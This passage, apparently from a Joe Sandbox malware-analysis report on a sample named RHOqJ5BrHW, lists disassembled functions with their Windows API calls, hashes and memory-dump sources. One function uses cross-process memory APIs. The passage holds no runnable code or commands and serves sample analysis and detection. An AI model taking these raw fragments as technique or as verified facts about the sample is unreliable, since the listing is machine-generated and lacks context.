                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 47921759-0
                                    • Opcode ID: b9238eeb1facb986b294c1dd53d8656fe6a3ffc5e9a3b67ecf8e32fa0f0ef882
                                    • Instruction ID: e04f832c80cf6c570a17e871c676206b97bafea3b2b0b00c843a27a44d279736
                                    • Opcode Fuzzy Hash: b9238eeb1facb986b294c1dd53d8656fe6a3ffc5e9a3b67ecf8e32fa0f0ef882
                                    • Instruction Fuzzy Hash: C3F04F762002086FEB119FE4AD89EAB3BADFF49765F400519FA45C7190DB609C43CA71
                                    Function 009BEC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDlgItem.USER32(?,000003E9), ref: 009BEC94
                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 009BECAB
                                    • MessageBeep.USER32(00000000), ref: 009BECC3
                                    • KillTimer.USER32(?,0000040A), ref: 009BECDF
                                    • EndDialog.USER32(?,00000001), ref: 009BECF9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                    • String ID:
                                    • API String ID: 3741023627-0
                                    • Opcode ID: ed967a6b71164c77a69fbfbf4e617ca22ea6fec60fc1478925e367f3bbecbd5b
                                    • Instruction ID: a435b3ded0ff436e806811ded0d6538ddddf1a69b7de93167d13ff3d428be6d0
                                    • Opcode Fuzzy Hash: ed967a6b71164c77a69fbfbf4e617ca22ea6fec60fc1478925e367f3bbecbd5b
                                    • Instruction Fuzzy Hash: 47018131500708ABEB249B90DF4EBD67BBCFB00715F000959B582A14E0DBF4AA9ACB80
                                    Function 0099B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                    Download Yara Rule
                                    APIs
                                    • EndPath.GDI32(?), ref: 0099B0BA
                                    • StrokeAndFillPath.GDI32(?,?,009FE680,00000000,?,?,?), ref: 0099B0D6
                                    • SelectObject.GDI32(?,00000000), ref: 0099B0E9
                                    • DeleteObject.GDI32 ref: 0099B0FC
                                    • StrokePath.GDI32(?), ref: 0099B117
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                    • String ID:
                                    • API String ID: 2625713937-0
                                    • Opcode ID: 662ea77bebad4581f4f476c19933acf66537edf3ac46ae9da6472a81be8c3765
                                    • Instruction ID: 20bc604fb8896cd1951e05d913ad87d00d1ea34910ca3963c8ba4373df030874
                                    • Opcode Fuzzy Hash: 662ea77bebad4581f4f476c19933acf66537edf3ac46ae9da6472a81be8c3765
                                    • Instruction Fuzzy Hash: E6F0F639004208AFCB21DFE9ED08B647F64A742366F088314F429440F0C7368997CF50
                                    Function 009CF23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 009CF2DA
                                    • CoCreateInstance.OLE32(00A0DA7C,00000000,00000001,00A0D8EC,?), ref: 009CF2F2
                                    • CoUninitialize.OLE32 ref: 009CF555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateInitializeInstanceUninitialize
                                    • String ID: .lnk
                                    • API String ID: 948891078-24824748
                                    • Opcode ID: 875c057d3ea5e58aa87fc4c0f7f6ed50183bbccb4da61f2593aca7601d7d1d60
                                    • Instruction ID: 44550724a8a282995f0b44f0b7223810053059eab5fce45703cc1484c62bd54f
                                    • Opcode Fuzzy Hash: 875c057d3ea5e58aa87fc4c0f7f6ed50183bbccb4da61f2593aca7601d7d1d60
                                    • Instruction Fuzzy Hash: E1A10BB2504201AFD700EFA4C891EABB7ECEFD8714F00495DF55597292EB70EA49CB62
                                    Function 009CE7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0098660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009853B1,?,?,009861FF,?,00000000,00000001,00000000), ref: 0098662F
                                    • CoInitialize.OLE32(00000000), ref: 009CE85D
                                    • CoCreateInstance.OLE32(00A0DA7C,00000000,00000001,00A0D8EC,?), ref: 009CE876
                                    • CoUninitialize.OLE32 ref: 009CE893
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                    • String ID: .lnk
                                    • API String ID: 2126378814-24824748
                                    • Opcode ID: 96ce3bdecf7648d637f0c956cb7547a321078b40d305bfb2673d4e03acb3905a
                                    • Instruction ID: 33dc0cc82f3d81d2c9d4f53102552eba920ce5463262180773fa89d5a3a60053
                                    • Opcode Fuzzy Hash: 96ce3bdecf7648d637f0c956cb7547a321078b40d305bfb2673d4e03acb3905a
                                    • Instruction Fuzzy Hash: 95A13775A043019FCB14EF14C884E2ABBE9BF89710F14895DF9969B3A1CB31ED45CB92
                                    Function 009A325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                    Download Yara Rule
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 009A32ED
                                      • Part of subcall function 009AE0D0: __87except.LIBCMT ref: 009AE10B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorHandling__87except__start
                                    • String ID: pow
                                    • API String ID: 2905807303-2276729525
                                    • Opcode ID: 66e4a235922aa1a1c641071afedbb93b73b37ea06c8c12d138b293c63aa0af87
                                    • Instruction ID: 8b7b720a297336b87b1cf52b9a3dba03b9e344df076b7d817024fd970d2d2ba6
                                    • Opcode Fuzzy Hash: 66e4a235922aa1a1c641071afedbb93b73b37ea06c8c12d138b293c63aa0af87
                                    • Instruction Fuzzy Hash: 2F514B31A0C20296CF15B758C94137A3B9CDB83750F60CD68F8E5822A9DF388D959BC6
                                    Function 009C4606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00A1DC50,?,0000000F,0000000C,00000016,00A1DC50,?), ref: 009C4645
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                    • CharUpperBuffW.USER32(?,?,00000000,?), ref: 009C46C5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper$__itow__swprintf
                                    • String ID: REMOVE$THIS
                                    • API String ID: 3797816924-776492005
                                    • Opcode ID: 5298a98622a6013ada46f289278952fe3c3faa08c8d3a0f68ad0aac8e815ef03
                                    • Instruction ID: bd74997649c60f59627754e133547cc357aad71553b759e142d449eb526c8c77
                                    • Opcode Fuzzy Hash: 5298a98622a6013ada46f289278952fe3c3faa08c8d3a0f68ad0aac8e815ef03
                                    • Instruction Fuzzy Hash: CB417C75A002099FCF05EFA4C891FAEB7B8BF89304F148459E916AB392DB34DD41CB51
                                    Function 009BC189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009C430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009BBC08,?,?,00000034,00000800,?,00000034), ref: 009C4335
                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 009BC1D3
                                      • Part of subcall function 009C42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009BBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 009C4300
                                      • Part of subcall function 009C422F: GetWindowThreadProcessId.USER32(?,?), ref: 009C425A
                                      • Part of subcall function 009C422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,009BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 009C426A
                                      • Part of subcall function 009C422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,009BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 009C4280
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009BC240
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009BC28D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                    • String ID: @
                                    • API String ID: 4150878124-2766056989
                                    • Opcode ID: 77ff236956d2b3a3aeaa5ca72bbf7ff6d874c61112b4e99f4e23fc3823a63129
                                    • Instruction ID: f58b0cd348ca3d6b0e4f74993307de0878b128c10d87af5a307da5c48124e071
                                    • Opcode Fuzzy Hash: 77ff236956d2b3a3aeaa5ca72bbf7ff6d874c61112b4e99f4e23fc3823a63129
                                    • Instruction Fuzzy Hash: 25412C72A0021CAFDB11DFA4CD92FEEB7B8AF49710F004099FA55B7181DA71AE45CB61
                                    Function 009EA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A1DC00,00000000,?,?,?,?), ref: 009EA6D8
                                    • GetWindowLongW.USER32 ref: 009EA6F5
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 009EA705
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$Long
                                    • String ID: SysTreeView32
                                    • API String ID: 847901565-1698111956
                                    • Opcode ID: dbf99d262fb182d75e7012c3c54e2d338c9c578c64401c149cc107c8b9d2e154
                                    • Instruction ID: a8eb4fd4b96c27daedc21044b129a4429f638aae04b5427c67adb199c72a6491
                                    • Opcode Fuzzy Hash: dbf99d262fb182d75e7012c3c54e2d338c9c578c64401c149cc107c8b9d2e154
                                    • Instruction Fuzzy Hash: 1131AD36600249AFDB228E79CC41BEA7BA9FB89334F244715F975922E0D735EC518B90
                                    Function 009EA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009EA15E
                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009EA172
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 009EA196
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window
                                    • String ID: SysMonthCal32
                                    • API String ID: 2326795674-1439706946
                                    • Opcode ID: 138aa164aafc780afe0f1355fadc6476e6eb0ab096e1ab8a754b74d992f29124
                                    • Instruction ID: 4d924590552698cd5971714c589affb3c81e96c0782e8f7f0fdb5c0ebab2bda9
                                    • Opcode Fuzzy Hash: 138aa164aafc780afe0f1355fadc6476e6eb0ab096e1ab8a754b74d992f29124
                                    • Instruction Fuzzy Hash: 2C217F32510218ABDF168F94CC82FEA3B7AEF88754F110214FA556B1E0D6B5BC55CB91
                                    Function 009EA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 009EA941
                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 009EA94F
                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009EA956
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$DestroyWindow
                                    • String ID: msctls_updown32
                                    • API String ID: 4014797782-2298589950
                                    • Opcode ID: 1e5596bac8fafb8cca31cf0dddc2370a00aa2a4f9f3ea26659840ef79a7380bc
                                    • Instruction ID: bddeb1a4e4b42c1b106e4bc5ad7115b386d21649f8ece297de0a5dd57b1f6acf
                                    • Opcode Fuzzy Hash: 1e5596bac8fafb8cca31cf0dddc2370a00aa2a4f9f3ea26659840ef79a7380bc
                                    • Instruction Fuzzy Hash: BB21B0B5200209AFDB11DF69CC81D7777ADEB8A3A4B050059FA049B3A2CB31FC128B61
                                    Function 009E99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 009E9A30
                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 009E9A40
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 009E9A65
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$MoveWindow
                                    • String ID: Listbox
                                    • API String ID: 3315199576-2633736733
                                    • Opcode ID: 4ad6d323f9fcc976451f9fc877e10887aac1a937e5a15eaac58283868ee55e1a
                                    • Instruction ID: ba89e842a0965f757f3a3daefd92fa3903235158875f7f85f1eaaf0dcc76fa12
                                    • Opcode Fuzzy Hash: 4ad6d323f9fcc976451f9fc877e10887aac1a937e5a15eaac58283868ee55e1a
                                    • Instruction Fuzzy Hash: 6F21D432610158BFDF228F55CC85FBB3BAEEF89750F018129F9549B1A0C6719C52C7A0
                                    Function 009EA409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009EA46D
                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009EA482
                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 009EA48F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: msctls_trackbar32
                                    • API String ID: 3850602802-1010561917
                                    • Opcode ID: fb94299566efefffaed64135c0eaaea9750883adc3e1776b6e20aa377b50f363
                                    • Instruction ID: 6c1576a732de324e2278dbfce66844469d26edd88f7f19df595c36f13d6ae18c
                                    • Opcode Fuzzy Hash: fb94299566efefffaed64135c0eaaea9750883adc3e1776b6e20aa377b50f363
                                    • Instruction Fuzzy Hash: 6F11C471200248BAEF259F66CC45FAB776DEF89754F014118FA45960F1E2B2E811C720
                                    Function 009A2287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 009A22A1
                                    • GetProcAddress.KERNEL32(00000000), ref: 009A22A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RoInitialize$combase.dll
                                    • API String ID: 2574300362-340411864
                                    • Opcode ID: 4afe3e877d05d458876924a0d53863a6a47bde03b1785ad6d6539509b9ec7be8
                                    • Instruction ID: fe114edb0c7212c1b64062de15b35653a59d4ebb0ffce78ae2fca2dc5745c9e5
                                    • Opcode Fuzzy Hash: 4afe3e877d05d458876924a0d53863a6a47bde03b1785ad6d6539509b9ec7be8
                                    • Instruction Fuzzy Hash: 2DE01A796A0304ABEB20DFF8ED4DF143668B756702F004520B642D50E0CBB64053DF04
                                    Function 009A235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009A2276), ref: 009A2376
                                    • GetProcAddress.KERNEL32(00000000), ref: 009A237D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RoUninitialize$combase.dll
                                    • API String ID: 2574300362-2819208100
                                    • Opcode ID: d4fa2c1b40f789918f4d7d1e52db57cdff8346047fbfeb95cf9b8145cb1cd25a
                                    • Instruction ID: 31b9492fe64a68ed9a3f67a6d648b239b4c2bfd8f8582445f76cc4c1f0273074
                                    • Opcode Fuzzy Hash: d4fa2c1b40f789918f4d7d1e52db57cdff8346047fbfeb95cf9b8145cb1cd25a
                                    • Instruction Fuzzy Hash: 93E0B679645304ABDB20EFE8ED0DF043A69B767B06F200514F24AD20B0CBBA9412AA14
                                    Function 009FAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: LocalTime__swprintf
                                    • String ID: %.3d$WIN_XPe
                                    • API String ID: 2070861257-2409531811
                                    • Opcode ID: cf47b7c8850b71984c8208dc4558f1e0605e682226d0e1631fbb6d16299e8778
                                    • Instruction ID: f4a3c9752a2ed33c3d2e45aaf1b60b18b767c4cb3c302cc817b0cf72c16a7d33
                                    • Opcode Fuzzy Hash: cf47b7c8850b71984c8208dc4558f1e0605e682226d0e1631fbb6d16299e8778
                                    • Instruction Fuzzy Hash: BBE012F180561CEBCB51D790CD45DFA737CA708741F100892FA8AA1000D63D9B95AB12
                                    Function 009842F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,009842EC,?,009842AA,?), ref: 00984304
                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00984316
                                    Strings
                                    Memory Dump Source
